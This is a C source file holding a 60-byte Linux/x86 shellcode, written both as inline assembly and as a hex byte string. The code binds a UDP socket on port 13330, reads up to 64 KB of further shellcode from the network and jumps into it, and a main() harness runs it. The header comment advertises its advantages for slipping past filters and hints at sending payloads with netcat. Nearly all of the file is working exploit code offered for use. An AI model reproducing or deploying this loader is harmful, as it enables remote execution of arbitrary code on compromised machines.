/**
 ** Linux/x86 udp + read + exec shellcode (c) gunzip
 **
 ** reads from udp port 13330 another shellcode then executes it
 ** 
 ** 1. Udp is usually not filtered
 ** 2. You can send very big shellcode (size <= 65535)
 ** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
 ** 4. Your sent shellcodes can contain any char ( 0x00 too )
 ** 5  You can send a whole shell script to execute with a command code
 ** 6. Does not contain CR, LF, spaces, slashes and so on  
 ** 7. No need to search for file descriptors
 ** 
 ** gunzip@ircnet <techieone@softhome.net>
 ** http://members.xoom.it/gunzip
 **
 ** If you can't figure it out how to use this you don't need this.. 
 ** hint: try with puts( shellcode ) and pipe netcat -u host
 **
 ** HaPPy BiRtHdAy tankie !!! :-]
 ** 
 **/

void udp_exec()
{
	__asm__("
		/* fd = socket( AF_INET, SOCK_DGRAM, 0 ) */

                xorl    %eax,   %eax
                xorl    %ebx,   %ebx
		incl	%ebx			# socket()
                pushl   %eax			# IPPROTO_IP
		pushl	$0x2			# SOCK_DGRAM
		pushl	$0x2			# AF_INET
                movl    %esp,   %ecx
                movb    $0x66,  %al             # SYS_socketcall
                int     $0x80

		/* bind(s, (struct sockaddr *)&sa, sizeof(sa)) */

		decl	%ebx			# ebx = 0x0
		pushl	%ebx			# PAD
		pushl	%ebx			# PAD
		pushl 	%ebx			# INADDR_ANY
		pushw	$0x1234			# PORT  (13330)
		pushw	$0x2			# ADDRESS FAMILY
		movl	%esp,	%ecx		
		pushl	$0x16			# sizeof(struct sockaddr)
		pushl	%ecx			# pointer to struct sockaddr
		pushl	%eax			# socket file descriptor
		movl	%esp,	%ecx		# SYS_socketcall * args
		movb	$0x2,   %bl		# SYS_socketcall bind()

		push	$0x66			# SYS_socketcall
		popl	%eax
		int	$0x80

		/* read( s, buf, 0xffff ); jmp *buf */

                movl    (%esp),	%ebx            # socket fd
		cltd				# on bind success eax = 0x0
		movw	$0xffff,%dx		# len = 65535
		subl	%edx, 	%esp		# reserves space
                movl    %esp,   %ecx            # where to read
		movb   	$0x03,	%al		# SYS_read
		int    	$0x80
		jmp	*%ecx
		");
}

#define PORT	"\x34\x12"

char shellcode[]=
	"\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
	"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
	"\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
	"\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

main()
{
	void (*f)() = (void *)&shellcode;
	printf("\n[+] Udp read shellcode by gunzip, len = %d\n", strlen(shellcode));
	f();
}